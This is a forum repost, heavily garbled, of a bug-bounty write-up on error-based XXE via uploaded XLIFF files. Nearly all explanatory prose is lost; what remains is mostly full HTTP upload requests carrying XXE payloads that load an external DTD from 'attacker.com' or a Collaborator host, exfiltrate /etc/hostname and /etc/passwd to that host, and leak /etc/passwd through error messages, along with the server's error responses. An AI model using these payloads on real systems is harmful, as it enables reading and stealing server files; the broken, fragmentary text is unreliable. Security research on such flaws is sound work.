搜索

[29019] 2021-06-20_【安全分析】使用XLIFF文件通过基于错误的XXE读取完整本地文件

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-06-20_【安全分析】使用XLIFF文件通过基于错误的XXE读取完整本地文件 使   X L I F F     X X E   O t s   2 0 2 1 - 0 6 - 2 0 O t s     - 广   =     U R L   P r i v a t e     B u g   H u n t i n g   .     X L I F F   X L I F F X M L     X M L     C A T   X L I F F     X M L   X M L   X X E     X X E     B u r p   C o l l a b o r a t o r   B u r p   C o l l a b o r a t o r   L o c a l i z a t i o n X L I F F p a r a m e t e r   e n t i t i e s g e n e r a l   e n t i t i e s P O S T   / r e d a c t e d - e n d p o i n t   H T T P / 2 H o s t :   t a r g e t . c o m C o o k i e :   - C o n t e n t - L e n g t h :   - C a c h e - C o n t r o l :   m a x - a g e = 0 S e c - C h - U a :   "   N o t   A ; B r a n d " ; v = " 9 9 " ,   " C h r o m i u m " ; v = " 9 0 " ,   " G o o g l e   C h r o m e " ; v = " 9 0 " S e c - C h - U a - M o b i l e :   ? 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 D n t :   1 C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 5 _ 7 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 9 0 . 0 . 4 4 3 0 . 9 3   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / a v i f , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 S e c - F e t c h - S i t e :   s a m e - o r i g i n A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   i d - I D , i d ; q = 0 . 9 , e n - U S ; q = 0 . 8 , e n ; q = 0 . 7 , e u ; q = 0 . 6 , m s ; q = 0 . 5 C o n n e c t i o n :   c l o s e - - - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " f i l e " ;   f i l e n a m e = " x x e . x l i f f " C o n t e n t - T y p e :   a p p l i c a t i o n / x - x l i f f + x m l < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   X X E   [ < ! E N T I T Y   %   r e m o t e   S Y S T E M   " h t t p : / / r e d a c t e d . b u r p c o l l a b o r a t o r . n e t / ? x x e _ t e s t " >   % r e m o t e ;   ] > < x l i f f   s r c L a n g = " e n "   t r g L a n g = " m s - M Y "   v e r s i o n = " 2 . 0 " > < / x l i f f > - - - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 - - { " s t a t u s " : 5 0 0 , " e r r o r " : " I n t e r n a l   S e r v e r   E r r o r " , " m e s s a g e " : " E r r o r   s y s t e m I d :   h t t p : / / r e d a c t e d . b u r p c o l l a b o r a t o r . n e t / ? x x e _ t e s t ;   T h e   m a r k u p   d e c l a r a t i o n s   c o n t a i n e d   o r   p o i n t e d   t o   b y   t h e   d o c u m e n t   t y p e   d e c l a r a t i o n   m u s t   b e   w e l l - f o r m e d . " }
  X X E     D T D     V P S     D T D   / e t c / h o s t n a m e   B u r p   C o l l a b o r a t o r   使 J a v a   1 . 8   J a v a     X X E   使 N e w   L i n e / e t c / p a s s w d < ! E N T I T Y   %   d a t a   S Y S T E M   " f i l e : / / / e t c / h o s t n a m e " > < ! E N T I T Y   %   f o o   " < ! E N T I T Y   & # 3 7 ;   x x e   S Y S T E M   ' h t t p s : / / r e d a c t e d . b u r p c o l l a b o r a t o r . n e t / ? x x e = % d a t a ; ' > " > % f o o ; % x x e ; P O S T   / r e d a c t e d - e n d p o i n t   H T T P / 2 H o s t :   t a r g e t . c o m C o o k i e :   - C o n t e n t - L e n g t h :   - C a c h e - C o n t r o l :   m a x - a g e = 0 S e c - C h - U a :   "   N o t   A ; B r a n d " ; v = " 9 9 " ,   " C h r o m i u m " ; v = " 9 0 " ,   " G o o g l e   C h r o m e " ; v = " 9 0 " S e c - C h - U a - M o b i l e :   ? 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 D n t :   1 C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 5 _ 7 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 9 0 . 0 . 4 4 3 0 . 9 3   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / a v i f , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 S e c - F e t c h - S i t e :   s a m e - o r i g i n A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   i d - I D , i d ; q = 0 . 9 , e n - U S ; q = 0 . 8 , e n ; q = 0 . 7 , e u ; q = 0 . 6 , m s ; q = 0 . 5 C o n n e c t i o n :   c l o s e - - - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " f i l e " ;   f i l e n a m e = " x x e . x l i f f " C o n t e n t - T y p e :   a p p l i c a t i o n / x - x l i f f + x m l < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   X X E   [ < ! E N T I T Y   %   r e m o t e   S Y S T E M   " h t t p : / / a t t a c k e r . c o m / e v i l . d t d " >   % r e m o t e ;   ] > < x l i f f   s r c L a n g = " e n "   t r g L a n g = " m s - M Y "   v e r s i o n = " 2 . 0 " > < / x l i f f > - - - - - - W e b K i t F o r m B o u n d a r y q B d A s E t Y a B j T A r l 3 - -
使   F T P   X X E L o c a l   F i l e s   U R L @ p w n f u n c t i o n   X X E     -   G o o g l e   C T F h t t p s : / / w w w . y o u t u b e . c o m / w a t c h ? v = 0 f d p F Q X W V u 4   D T D   n o n - e x i s t D T D n o n - e x i s t D T D { " s t a t u s " : 5 0 0 , " e r r o r " : " I n t e r n a l   S e r v e r   E r r o r " , " m e s s a g e " : " E r r o r   s y s t e m I d :   h t t p : / / r e d a c t e d . b u r p c o l l a b o r a t o r . n e t / ? x x e _ t e s t ;   T h e   m a r k u p   d e c l a r a t i o n s   c o n t a i n e d   o r   p o i n t e d   t o   b y   t h e   d o c u m e n t   t y p e   d e c l a r a t i o n   m u s t   b e   w e l l - f o r m e d . " } < ! E N T I T Y   %   d a t a   S Y S T E M   " f i l e : / / / e t c / p a s s w d " > < ! E N T I T Y   %   f o o   " < ! E N T I T Y   & # 3 7 ;   x x e   S Y S T E M   ' f i l e : / / / n o f i l e / ' > " > % f o o ; % x x e ; { " s t a t u s " : 5 0 0 , " e r r o r " : " I n t e r n a l   S e r v e r   E r r o r " , " m e s s a g e " : " I O   e r r o r . n R e a s o n :   / n o f i l e   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) " } < ! E N T I T Y   %   d a t a   S Y S T E M   " f i l e : / / / e t c / p a s s w d " > < ! E N T I T Y   %   f o o   " < ! E N T I T Y   & # 3 7 ;   x x e   S Y S T E M   ' f i l e : / / / n o f i l e / % d a t a ; ' > " > % f o o ; % x x e ;
  P 1  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理